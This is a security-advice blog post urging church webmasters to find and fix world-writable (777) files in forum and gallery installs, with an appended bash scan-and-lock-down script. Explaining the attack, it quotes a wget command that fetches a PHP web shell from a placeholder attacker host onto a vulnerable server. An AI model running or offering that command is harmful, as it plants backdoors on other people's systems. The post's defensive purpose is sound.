Heal Your Church WebSite

Teaching, rebuking, correcting & training in righteous web design.

How to make ‘find -perm 777’ your first ssh security stop

Want to get hacked? It’s easy: just ‘chmod 777’ everything the next time you install a bbs or photo gallery application. Don’t want to get hacked? Read on and ‘find’ how hackers see and exploit the unsecured areas of your system.

For those of you running online community applications such as phpBB, vBulletin, Coppermine Gallery, Mambo and a few others, installation can be a breeze if you have shell access. That said, installations can also lead to an unwanted visit if you get sloppy with your file permissions during the install.

For today’s example, I’ll pick on vBulletin because it is a commercial product, but be warned: today’s topic of discussion applies equally to ANY host of ‘open sores’ applications.

The ne’er-do-well runs a Google search for those websites that are ‘Powered by: vBulletin Version 3.nn.nn.’ Upon finding a potential victim, they visit the site and … pay attention now … through their browser request a URL on your system that contains a remote command. That first remote command is likely to include “find -perm 777” giving the hakr all the information he needs to then “wget http://badguyhost.ru/myshell.php -O /your/unsecure/directory/logon.php” onto your system.

Once such a php-based backdoor application is loaded, there is nothing left but to wipe your system clean and pray your backups are recent and reliable (more on that topic another time).

So two things I ask of you.

  1. Keep your online applications up-to-date – get on their mailing list to keep abreast of changes, updates and patches.
  2. For those of you with shell access to your system, run file permission scans such as ‘find -perm 777’ on your system before someone less trustworthy does. You might be disturbed by what you ‘find.’

For those of you whose paranoia-meter just went off scale, here is a command that for now will lock down those open areas:

find . -perm 777 -exec chmod 755 {} \;

For those of you with root access:

find / -perm 777 -type d
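
A wider version of the scan above, as an added example that is not part of the original post: ‘-perm 777’ matches that one exact mode only, so it misses other world-writable modes such as 666 or 757, and on Linux it also matches symlinks, which always show as 777 and cause chmod to change the link’s target. The function names and the constructed sample tree are assumptions for illustration.

```bash
#!/usr/bin/env bash
# Added example, not from the original post. Function names are illustrative.

# Shared find predicate: regular files and directories with the "other"
# write bit set. -perm -0002 matches every such mode (777, 757, 666, ...),
# whereas -perm 777 matches that one exact mode only.
# Restricting to -type f / -type d skips symlinks, which always show as
# 777 on Linux and would make chmod change the link's target instead.
# ! -perm -1000 skips sticky-bit directories such as /tmp (mode 1777).
ww_find() {
    root=$1; shift
    find "$root" \( -type f -o -type d \) -perm -0002 ! -perm -1000 "$@"
}

# Report only.
list_world_writable() { ww_find "$1" -print; }

# Remove write access for "other" and nothing else, so a 666 data file
# becomes 664 rather than an executable 755.
lock_down() { ww_find "$1" -exec chmod o-w {} +; }

# Build a constructed sample tree under $1 for trying the functions out.
make_demo_tree() {
    mkdir -p "$1/web/uploads" "$1/outside"
    touch "$1/web/a.php" "$1/web/b.dat" "$1/web/ok.html" "$1/outside/target"
    chmod 755 "$1/web"
    chmod 777 "$1/web/uploads" "$1/web/a.php" "$1/outside/target"
    chmod 666 "$1/web/b.dat"
    chmod 644 "$1/web/ok.html"
    ln -s "$1/outside/target" "$1/web/link"   # symlink pointing outside the tree
}

# Usage: script.sh /path/to/webroot   (reports only; call lock_down to fix)
[ "$#" -eq 0 ] || list_world_writable "$1"
```

Run the report first and review it before calling lock_down, since some applications expect a group-writable upload directory and only the "other" bit is being removed here.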

You may also want to run a scan for programs that provide web-based shell access. You’ll be glad you did.
